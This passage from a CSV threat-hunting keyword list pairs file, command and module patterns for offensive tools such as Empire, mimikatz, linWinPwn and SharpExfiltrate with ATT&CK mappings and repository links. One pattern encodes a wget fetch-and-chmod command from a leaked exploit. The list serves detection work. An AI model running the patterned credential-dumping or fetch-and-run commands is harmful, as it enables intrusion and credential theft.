with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*username-anarchy *","offensive_tool_keyword","username-anarchy","Tools for generating usernames when penetration testing. Usernames are half the password brute force problem.","T1110 - T1134 - T1078","TA0006","N/A","N/A","Credential Access","https://github.com/urbanadventurer/username-anarchy","1","0","N/A","N/A","6","564","113","2022-01-26T18:34:02Z","2012-11-07T05:35:10Z" +"*UsernameAsPasswordCreds.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*userpass_cme_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*userpass_kerbrute_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*UserPassBruteForce*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*users/public/troubleshooting_log.log*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*users\\public\\elevationstation.js*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*users\\usethis\\NewFile.txt*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*users\public\example.bin*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","0","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" +"*users\public\temp.bin*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","0","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" +"*users_asreproast.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*users_dcsrp_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*users_kerberoasting.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD 
Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*users_list_cme_ldap_nullsess_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*users_list_kerbrute_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*users_list_ridbrute_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*users_no_req_pass.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*users_no_req_pass_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - 
TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*usestager *","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*usestager *backdoor*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - 
T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*usestager *ducky*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*usestager *launcher_bat*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*usestager *launcher_lnk*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 
- T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*usestager *shellcode*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*usestager multi/launcher*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*using donutCS*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*using NixImports*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - 
T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*using SharpExfiltrate*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" +"*using SharpView.Enums*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" +"*using SMBeagle*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*Using VirusToal website as external C2*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*UsoDllLoader*","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. 
It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/itm4n/UsoDllLoader","1","1","N/A","N/A","4","368","104","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z" +"*usr/bin/wget -O /tmp/a http* chmod 755 /tmp/cron*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols) for FreeBSD OpenBSD 3.1 OpenBSD 3.2 (with a non-executable stack zomg) and Linux. Likely CVE-2003-0201. There is also a Solaris version","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*usr/share/seclists*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*usr/src/rusthound rusthound *","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*util.nimplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*util/dot_net_deserialization/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*utils/payloads.db*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*Utils\Posh.cs*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*uTorrent (1).exe*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. 
Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*uTorrent.exe*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*utorrent_installer.exe*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*utweb_installer.exe*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*V3n0M-Scanner*","offensive_tool_keyword","V3n0M-Scanner","V3n0M is a free and open source scanner. Evolved from baltazars scanner. it has adapted several new features that improve fuctionality and usability. It is mostly experimental software. 
This program is for finding and executing various vulnerabilities. It scavenges the web using dorks and organizes the URLs it finds. Use at your own risk.","T1210.001 - T1190 - T1191 - T1595","TA0007 - TA0002 - TA0008 - TA0010","N/A","N/A","Web Attacks","https://github.com/v3n0m-Scanner/V3n0M-Scanner","1","1","N/A","N/A","10","1342","432","2023-10-03T06:04:39Z","2013-10-21T06:05:17Z" +"*v4d1/Dome*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*valid_user@contoso.com:Password1*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*vanhauser-thc/thc-hydra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*vault::*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" 
+"*vault::cred*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*vault::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*vba-macro-mac-persistence.vbs*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" +"*VBA-RunPE -*","offensive_tool_keyword","VBA-RunPE","A simple yet effective implementation of the RunPE technique in VBA. This code can be used to run executables from the memory of Word or Excel. 
